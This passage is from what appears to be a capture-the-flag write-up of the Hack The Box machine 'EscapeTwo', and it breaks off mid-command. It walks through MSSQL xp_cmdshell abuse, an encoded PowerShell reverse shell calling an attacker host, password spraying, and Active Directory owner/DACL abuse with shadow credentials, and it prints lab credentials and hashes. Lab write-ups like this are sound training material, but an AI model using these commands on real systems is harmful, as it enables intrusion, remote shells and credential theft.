class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">t</span> <span class="attr">xml:space</span>=<span class="string">&quot;preserve&quot;</span>&gt;</span>MSSQLP@ssw0rd!<span class="tag">&lt;/<span class="name">t</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">si</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">sst</span>&gt;</span></span><br></pre></td></tr></table></figure></div><p>By logging into mssql using <code>mssqlclient.py</code> we enabled <code>enable_xp_cmdshell</code> to execute commands inside mssql.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo mssqlclient.py sa:&#x27;MSSQLP@ssw0rd!&#x27;@10.10.11.51            </span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Encryption required, switching to TLS</span><br><span class="line">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master</span><br><span class="line">[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english</span><br><span class="line">[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</span><br><span class="line">[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to &#x27;master&#x27;.</span><br><span class="line">[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.</span><br><span class="line">[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) </span><br><span class="line">[!] Press help for extra shell commands</span><br><span class="line">SQL (sa  dbo@master)&gt; enable_xp_cmdshell</span><br><span class="line">INFO(DC01\SQLEXPRESS): Line 185: Configuration option &#x27;show advanced options&#x27; changed from 1 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">INFO(DC01\SQLEXPRESS): Line 185: Configuration option &#x27;xp_cmdshell&#x27; changed from 0 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">SQL (sa  dbo@master)&gt; xp_cmdshell whoami</span><br><span class="line">output           </span><br><span class="line">--------------   </span><br><span class="line">sequel\sql_svc   </span><br><span class="line"></span><br><span class="line">NULL             </span><br><span class="line"></span><br><span class="line">SQL (sa  dbo@master)&gt; </span><br><span class="line"></span><br></pre></td></tr></table></figure></div><p>Inside mssql shell I used powershell reverse shell payload and got a shell as <code>sql_svc</code> user.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo mssqlclient.py sa:&#x27;MSSQLP@ssw0rd!&#x27;@10.10.11.51</span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] Encryption required, switching to TLS</span><br><span class="line">[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master</span><br><span class="line">[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english</span><br><span class="line">[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</span><br><span class="line">[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to &#x27;master&#x27;.</span><br><span class="line">[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.</span><br><span class="line">[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) </span><br><span class="line">[!] Press help for extra shell commands</span><br><span class="line">SQL (sa  dbo@master)&gt; enable_xp_cmdshell</span><br><span class="line">INFO(DC01\SQLEXPRESS): Line 185: Configuration option &#x27;show advanced options&#x27; changed from 1 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">INFO(DC01\SQLEXPRESS): Line 185: Configuration option &#x27;xp_cmdshell&#x27; changed from 1 to 1. Run the RECONFIGURE statement to install.</span><br><span class="line">SQL (sa  dbo@master)&gt; xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA3ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure></div><h4 id="sql-svc"><a href="#sql-svc" class="headerlink" title="sql_svc"></a>sql_svc</h4><p>Inside <code>C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI</code> file, we were able to find new password.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nc -nvlp 443</span><br><span class="line">Listening on 0.0.0.0 443</span><br><span class="line">Connection received on 10.10.11.51 65091</span><br><span class="line"></span><br><span class="line">PS C:\Windows\system32&gt; whoami</span><br><span class="line">sequel\sql_svc</span><br><span class="line">PS C:\Windows\system32&gt; </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line">PS C:\Windows\system32&gt; cd C:/</span><br><span class="line">PS C:\&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----        11/5/2022  12:03 PM                PerfLogs                                                              </span><br><span class="line">d-r---         1/4/2025   7:11 AM                Program Files                                                         </span><br><span class="line">d-----         6/9/2024   8:37 AM                Program Files (x86)                                                   </span><br><span class="line">d-----         6/8/2024   3:07 PM                SQL2019                                                               </span><br><span class="line">d-r---         6/9/2024   6:42 AM                Users                                                                 </span><br><span class="line">d-----         1/4/2025   8:10 AM                Windows                                                               </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\&gt; cd SQL2019</span><br><span class="line">PS C:\SQL2019&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\SQL2019</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----         1/3/2025   7:29 AM                ExpressAdv_ENU                                                        </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\SQL2019&gt; cd ExpressAdv_ENU</span><br><span class="line">PS C:\SQL2019\ExpressAdv_ENU&gt; ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\SQL2019\ExpressAdv_ENU</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name                                                                  </span><br><span class="line">----                -------------         ------ ----                                                                  </span><br><span class="line">d-----         6/8/2024   3:07 PM                1033_ENU_LP                                                           </span><br><span class="line">d-----         6/8/2024   3:07 PM                redist                                                                </span><br><span class="line">d-----         6/8/2024   3:07 PM                resources                                                             </span><br><span class="line">d-----         6/8/2024   3:07 PM                x64                                                                   </span><br><span class="line">-a----        9/24/2019  10:03 PM             45 AUTORUN.INF                                                           </span><br><span class="line">-a----        9/24/2019  10:03 PM            788 MEDIAINFO.XML                                                         </span><br><span class="line">-a----         6/8/2024   3:07 PM             16 PackageId.dat                                                         </span><br><span class="line">-a----        9/24/2019  10:03 PM         142944 SETUP.EXE                                                             </span><br><span class="line">-a----        9/24/2019  10:03 PM            486 SETUP.EXE.CONFIG                                                      </span><br><span class="line">-a----         6/8/2024   3:07 PM            717 sql-Configuration.INI                                                 </span><br><span class="line">-a----        9/24/2019  10:03 PM         249448 SQLSETUPBOOTSTRAPPER.DLL                                              </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">PS C:\SQL2019\ExpressAdv_ENU&gt; type sql-Configuration.INI</span><br><span class="line">[OPTIONS]</span><br><span class="line">ACTION=&quot;Install&quot;</span><br><span class="line">QUIET=&quot;True&quot;</span><br><span class="line">FEATURES=SQL</span><br><span class="line">INSTANCENAME=&quot;SQLEXPRESS&quot;</span><br><span class="line">INSTANCEID=&quot;SQLEXPRESS&quot;</span><br><span class="line">RSSVCACCOUNT=&quot;NT Service\ReportServer$SQLEXPRESS&quot;</span><br><span class="line">AGTSVCACCOUNT=&quot;NT AUTHORITY\NETWORK SERVICE&quot;</span><br><span class="line">AGTSVCSTARTUPTYPE=&quot;Manual&quot;</span><br><span class="line">COMMFABRICPORT=&quot;0&quot;</span><br><span class="line">COMMFABRICNETWORKLEVEL=&quot;&quot;0&quot;</span><br><span class="line">COMMFABRICENCRYPTION=&quot;0&quot;</span><br><span class="line">MATRIXCMBRICKCOMMPORT=&quot;0&quot;</span><br><span class="line">SQLSVCSTARTUPTYPE=&quot;Automatic&quot;</span><br><span class="line">FILESTREAMLEVEL=&quot;0&quot;</span><br><span class="line">ENABLERANU=&quot;False&quot; </span><br><span class="line">SQLCOLLATION=&quot;SQL_Latin1_General_CP1_CI_AS&quot;</span><br><span class="line">SQLSVCACCOUNT=&quot;SEQUEL\sql_svc&quot;</span><br><span class="line">SQLSVCPASSWORD=&quot;WqSZAF6CysDQbGb3&quot;</span><br><span class="line">SQLSYSADMINACCOUNTS=&quot;SEQUEL\Administrator&quot;</span><br><span class="line">SECURITYMODE=&quot;SQL&quot;</span><br><span class="line">SAPWD=&quot;MSSQLP@ssw0rd!&quot;</span><br><span class="line">ADDCURRENTUSERASSQLADMIN=&quot;False&quot;</span><br><span class="line">TCPENABLED=&quot;1&quot;</span><br><span class="line">NPENABLED=&quot;1&quot;</span><br><span class="line">BROWSERSVCSTARTUPTYPE=&quot;Automatic&quot;</span><br><span class="line">IAcceptSQLServerLicenseTerms=True</span><br><span class="line">PS C:\SQL2019\ExpressAdv_ENU&gt; </span><br></pre></td></tr></table></figure></div><p>For validate new password with any users we need to generate username so using nxc we can generate it.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --users | awk &#x27;/SMB/ &amp;&amp; $3 ~ /^[0-9]/ &amp;&amp; $5 !~ /[*+\-]/ &#123;print $5&#125;&#x27; &gt; valid_users.txt</span><br><span class="line">Administrator</span><br><span class="line">Guest</span><br><span class="line">krbtgt</span><br><span class="line">michael</span><br><span class="line">ryan</span><br><span class="line">oscar</span><br><span class="line">sql_svc</span><br><span class="line">rose</span><br><span class="line">ca_svc</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><h3 id="User"><a href="#User" class="headerlink" title="User"></a>User</h3><p>After getting user lists i sprayed it with the password which we got from <code>sql-Configuration.INI</code> file and we got a hit on a user names <code>ryan</code> and got user.txt.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo nxc winrm 10.10.11.51 -u valid_users.txt -p WqSZAF6CysDQbGb3</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\Guest:WqSZAF6CysDQbGb3</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\krbtgt:WqSZAF6CysDQbGb3</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\michael:WqSZAF6CysDQbGb3</span><br><span class="line">WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo evil-winrm -i sequel.htb -u ryan -p &#x27;WqSZAF6CysDQbGb3&#x27;                         </span><br><span class="line">                                        </span><br><span class="line">Evil-WinRM shell v3.7</span><br><span class="line">                                        </span><br><span class="line">Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine</span><br><span class="line">                                        </span><br><span class="line">Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion</span><br><span class="line">                                        </span><br><span class="line">Info: Establishing connection to remote endpoint</span><br><span class="line">*Evil-WinRM* PS C:\Users\ryan\Documents&gt; ls ../Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    Directory: C:\Users\ryan\Desktop</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">-ar---        2/24/2025  12:22 AM             34 user.txt</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">*Evil-WinRM* PS C:\Users\ryan\Documents&gt; </span><br></pre></td></tr></table></figure></div><h3 id="Root"><a href="#Root" class="headerlink" title="Root"></a>Root</h3><p>With <code>ryan</code> we tried to dump bloodhound data using rusthound.</p><h4 id="Bloodhound"><a href="#Bloodhound" class="headerlink" title="Bloodhound"></a>Bloodhound</h4><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo rusthound --domain sequel.htb -i 10.10.11.51</span><br><span class="line">---------------------------------------------------</span><br><span class="line">Initializing RustHound at 04:56:17 on 02/24/25</span><br><span class="line">Powered by g0h4n from OpenCyber</span><br><span class="line">---------------------------------------------------</span><br><span class="line"></span><br><span class="line">[2025-02-24T09:56:17Z INFO  rusthound] Verbosity level: Info</span><br><span class="line">Username: ryan</span><br><span class="line">Password: </span><br><span class="line">[2025-02-24T09:56:25Z INFO  rusthound::ldap] Connected to SEQUEL.HTB Active Directory!</span><br><span class="line">[2025-02-24T09:56:25Z INFO  rusthound::ldap] Starting data collection...</span><br><span class="line">[2025-02-24T09:56:32Z INFO  rusthound::ldap] All data collected for NamingContext DC=sequel,DC=htb</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::modules::adcs::parser] Found 12 enabled certificate templates</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::json::parser] Parsing LDAP objects finished!</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::json::checker] Starting checker to replace some values...</span><br><span class="line">[2025-02-24T09:56:35Z INFO  rusthound::json::checker] Checking and replacing some values finished!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 10 users parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_users.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 67 groups parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_groups.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 computers parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_computers.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 ous parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_ous.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 domains parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_domains.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 2 gpos parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_gpos.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 21 containers parsed!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_containers.json created!</span><br><span class="line">[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 cas parsed!</span><br><span class="line"></span><br><span class="line">RustHound Enumeration Completed at 04:58:50 on 02/24/25! Happy Graphing!</span><br><span class="line"></span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><p><img                       lazyload                     src="/images/loading.svg"                     data-src="/../assets/Escape-Two/ryan-path.png"                                     ><br>The user <code>RYAN@SEQUEL.HTB</code> has the ability to modify the owner of the <code>CA_SVC@SEQUEL.HTB</code> account since he has write owner permission. So to exploit this we can use <code>bloodyAD</code> and modify the owner to ryan.<br>We changed owner of <code>CA_SVC</code> as <code>ryan</code>.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan </span><br><span class="line">[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on CA_SVC</span><br></pre></td></tr></table></figure></div><p>And after that i gave GenericAll privilege to <code>ca_svc</code> user.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo dacledit.py -action write -rights &#x27;FullControl&#x27; -principal ryan -target ca_svc &#x27;sequel.htb&#x27;/&quot;ryan&quot;:&quot;WqSZAF6CysDQbGb3&quot;</span><br><span class="line">Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies </span><br><span class="line"></span><br><span class="line">[*] DACL backed up to dacledit-20250224-054907.bak</span><br><span class="line">[*] DACL modified successfully!</span><br></pre></td></tr></table></figure></div><p>Since we dont have <code>ca_svc</code> user password or hash, we used shadow credential to get NT hash of <code>ca_svc</code> using certipy.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo certipy shadow auto -u &#x27;ryan@sequel.htb&#x27; -p &quot;WqSZAF6CysDQbGb3&quot; -account &#x27;ca_svc&#x27; -dc-ip &#x27;10.10.11.51&#x27; -target dc01.sequel.htb</span><br><span class="line">Certipy v4.8.2 - by Oliver Lyak (ly4k)</span><br><span class="line"></span><br><span class="line">[*] Targeting user &#x27;ca_svc&#x27;</span><br><span class="line">[*] Generating certificate</span><br><span class="line">[*] Certificate generated</span><br><span class="line">[*] Generating Key Credential</span><br><span class="line">[*] Key Credential generated with DeviceID &#x27;e9cbc711-26e5-8fe6-8d7b-0915e414d171&#x27;</span><br><span class="line">[*] Adding Key Credential with device ID &#x27;e9cbc711-26e5-8fe6-8d7b-0915e414d171&#x27; to the Key Credentials for &#x27;ca_svc&#x27;</span><br><span class="line">[*] Successfully added Key Credential with device ID &#x27;e9cbc711-26e5-8fe6-8d7b-0915e414d171&#x27; to the Key Credentials for &#x27;ca_svc&#x27;</span><br><span class="line">[*] Authenticating as &#x27;ca_svc&#x27; with the certificate</span><br><span class="line">[*] Using principal: ca_svc@sequel.htb</span><br><span class="line">[*] Trying to get TGT...</span><br><span class="line">[*] Got TGT</span><br><span class="line">[*] Saved credential cache to &#x27;ca_svc.ccache&#x27;</span><br><span class="line">[*] Trying to retrieve NT hash for &#x27;ca_svc&#x27;</span><br><span class="line">[*] Restoring the old Key Credentials for &#x27;ca_svc&#x27;</span><br><span class="line">[*] Successfully restored the old Key Credentials for &#x27;ca_svc&#x27;</span><br><span class="line">[*] NT hash for &#x27;ca_svc&#x27;: 3b181b914e7a9d5508ea1e20bc2b7fce</span><br><span class="line">➜  EscapeTwo </span><br></pre></td></tr></table></figure></div><h4 id="Find-vulnerable-certificate-using-Certipy"><a href="#Find-vulnerable-certificate-using-Certipy" class="headerlink" title="Find vulnerable certificate using Certipy"></a>Find vulnerable certificate using <code>Certipy</code></h4><p>After getting NT hash of <code>ca_svc</code> i used to find if there is any vulnerable templates and we found a template named <code>DunderMifflinAuthentication</code> is vulnerable to ESC4.</p><div class="code-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line">➜  EscapeTwo certipy find -dc-ip 10.10.11.51 -u ca_svc 